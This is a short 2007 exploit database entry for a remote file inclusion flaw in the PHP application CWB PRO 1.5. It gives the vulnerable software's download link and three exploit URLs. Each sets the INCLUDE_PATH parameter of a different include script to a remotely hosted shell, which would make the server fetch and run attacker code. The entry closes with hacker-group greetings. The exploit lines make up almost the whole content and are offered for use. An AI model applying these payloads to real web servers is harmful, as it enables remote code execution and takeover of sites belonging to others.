CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion

EDB-ID:

3628


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-04-01


# CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip 
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-01]